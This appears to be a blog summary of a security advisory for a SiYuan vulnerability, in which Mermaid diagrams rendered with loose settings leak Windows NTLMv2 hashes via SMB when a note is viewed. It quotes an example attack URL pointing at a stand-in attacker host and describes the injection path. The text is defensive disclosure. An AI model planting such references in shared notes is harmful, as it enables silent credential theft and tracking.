SiYuan patches zero-click NTLM hash leak via Mermaid rendering
TL;DR — SiYuan’s Mermaid diagram rendering can be abused to force outbound fetches from the Electron client; on Windows this can silently trigger SMB auth and leak NTLMv2 hashes when a victim merely views a note.
What happened
SiYuan is a personal knowledge management system with an Electron-based desktop client that renders rich content inside notes.
CVE-2026-40107 describes a High-severity issue where SiYuan configures Mermaid.js with securityLevel: "loose" and htmlLabels: true, allowing attacker-controlled <img> tags with attacker-chosen src values to survive sanitization and land inside SVG <foreignObject> content that is inserted into the DOM via innerHTML without secondary sanitization.
In the advisory’s Windows scenario, a protocol-relative URL like //attacker.com/image.png can resolve to a UNC path (\\attacker.com\image.png). Windows then attempts SMB authentication automatically, which can disclose the victim’s NTLMv2 hash to the attacker. The advisory also frames this as a cross-platform tracking pixel / blind SSRF primitive because the client will make an outbound request when rendering the diagram.
| Item | Source value |
|---|---|
| Affected software | siyuan |
| Impact (per advisory/CVE) | Zero-click NTLMv2 hash theft on Windows; outbound request as tracking/blind SSRF |
| Severity | CVSS v4.0 8.7 (High) |
| Affected versions | <= 3.6.3 (< 3.6.4) |
| Patched versions | v3.6.4 |
This is operationally important for platform and AppSec teams because it turns “viewing content” into a network credential exposure path (Windows SMB/NTLM) and creates a reliable outbound-call primitive from a desktop app—both patterns that routinely enable follow-on compromise in enterprise environments.
Who is impacted
- SiYuan deployments running versions
<= 3.6.3. - Windows users are at highest risk for credential exposure due to the UNC/SMB authentication behavior described in the advisory.
- Organizations where notes/notebooks can be imported, shared, or synced across users/teams (i.e., where untrusted Mermaid content can reach a victim).
What to do now
- Follow vendor remediation guidance and apply the patched release.
"Patched versions v3.6.4"
- Inventory endpoints and installs running
siyuan <= 3.6.3, prioritizing Windows fleets. - Treat Mermaid-rendered note content as untrusted input until confirmed patched, especially for shared/imported notebooks.
- If you suspect exposure, investigate for unexpected outbound connections to attacker-controlled hosts during note rendering and assess downstream NTLM relay / credential abuse risk in your environment.
Additional Information
- Vendor advisory (root cause, PoC, and suggested fix details): https://github.com/siyuan-note/siyuan/security/advisories/GHSA-w95v-4h65-j455
Content is AI-assisted and reviewed by our team, but issues may be missed and best practices evolve rapidly, send corrections to [email protected]. Always consult official documentation and validate key implementation decisions before making design or security choices.